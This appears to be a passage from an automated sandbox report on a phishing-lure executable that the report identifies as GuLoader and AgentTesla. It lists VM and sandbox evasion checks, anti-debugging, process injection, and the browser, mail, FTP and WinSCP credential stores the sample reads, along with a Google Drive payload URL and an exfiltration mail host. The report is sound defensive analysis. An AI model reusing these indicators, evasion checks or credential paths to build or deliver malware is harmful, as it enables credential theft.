            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213418524.0000000003970000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213418524.0000000003970000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14842173788.0000000001520000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 00000004.00000002.14842173788.0000000001520000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1ELHHSJRPST_5LMA9STSGBCGVR_KLZTCV
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10211303697.0000000000624000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEPLBB
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4524Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9956Jump to behavior
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeSystem information queried: ModuleInformationJump to behavior
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213474398.0000000003A39000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213474398.0000000003A39000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213474398.0000000003A39000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213418524.0000000003970000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213474398.0000000003A39000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213474398.0000000003A39000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000004.00000002.14843429399.000000000172B000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000002.14844252807.000000000179D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10211303697.0000000000624000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exepLbB
            Source: CasPol.exe, 00000004.00000002.14842173788.0000000001520000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213418524.0000000003970000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14842173788.0000000001520000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213474398.0000000003A39000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213474398.0000000003A39000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10213474398.0000000003A39000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000004.00000002.14846315169.0000000003209000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01286950 LdrInitializeThunk,4_2_01286950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeMemory written: C:\Windows\System32\conhost.exe base: 1340000Jump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: CasPol.exe, 00000004.00000002.14845781523.0000000001DB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000004.00000002.14845781523.0000000001DB0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 00000004.00000002.14845781523.0000000001DB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: CasPol.exe, 00000004.00000002.14845781523.0000000001DB0000.00000002.00020000.sdmpBinary or memory string: nProgram Manager1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 376, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 376, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 376, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 530287 Sample: 184285013-044310-Factura pe... Startdate: 29/11/2021 Architecture: WINDOWS Score: 100 19 malkaratso.org.tr 2->19 21 mail.malkaratso.org.tr 2->21 23 3 other IPs or domains 2->23 31 Found malware configuration 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected GuLoader 2->35 37 3 other signatures 2->37 8 184285013-044310-Factura pendiente (2).exe 1 2 2->8         started        signatures3 process4 signatures5 39 Writes to foreign memory regions 8->39 41 Tries to detect Any.run 8->41 43 Hides threads from debuggers 8->43 11 CasPol.exe 11 8->11         started        15 conhost.exe 8->15         started        process6 dnsIp7 25 malkaratso.org.tr 212.83.130.20, 49801, 587 OnlineSASFR France 11->25 27 drive.google.com 142.250.185.206, 443, 49798 GOOGLEUS United States 11->27 29 googlehosted.l.googleusercontent.com 142.250.186.161, 443, 49799 GOOGLEUS United States 11->29 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->47 49 Tries to steal Mail credentials (via file / registry access) 11->49 53 4 other signatures 11->53 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->51 17 conhost.exe 15->17         started        signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            184285013-044310-Factura pendiente (2).exe27%ReversingLabsWin32.Worm.GenericML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            malkaratso.org.tr0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%VirustotalBrowse
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            http://mail.malkaratso.org.tr0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://nIf2mZFBKJ.org0%Avira URL Cloudsafe
            http://UEjXzO.com0%Avira URL Cloudsafe
            http://malkaratso.org.tr0%Avira URL Cloudsafe
            https://nIf2mZFBKJ.orgD/o0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe
            https://nIf2mZFBKJ.orgt-0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            malkaratso.org.tr
            		212.83.130.20
            		truetrueunknown
            drive.google.com
            		142.250.185.206
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		142.250.186.161
              		truefalse
                		high
                mail.malkaratso.org.tr
                		unknown
                		unknowntrue
                  		unknown
                  doc-0s-7o-docs.googleusercontent.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-0s-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0bbf11090lmqcnv11oh7kschb18unor6/1638181725000/01591657853412424088/*/1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv?e=downloadfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1CasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNSCasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://doc-0s-7o-docs.googleusercontent.com/:CasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.10188398344.00000000017B0000.00000004.00000001.sdmpfalse
                        		high
                        https://sectigo.com/CPS0CasPol.exe, 00000004.00000002.14861622882.000000002068C000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14862012185.00000000206BA000.00000004.00000001.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://mail.malkaratso.org.trCasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://drive.google.com/:CasPol.exe, 00000004.00000002.14843429399.000000000172B000.00000004.00000020.sdmpfalse
                          		high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.google.com/CasPol.exe, 00000004.00000002.14843429399.000000000172B000.00000004.00000020.sdmpfalse
                            		high
                            https://nIf2mZFBKJ.orgCasPol.exe, 00000004.00000002.14855624319.000000001E558000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000004.00000002.14855188333.000000001E4FE000.00000004.00000001.sdmpfalse
                              		high
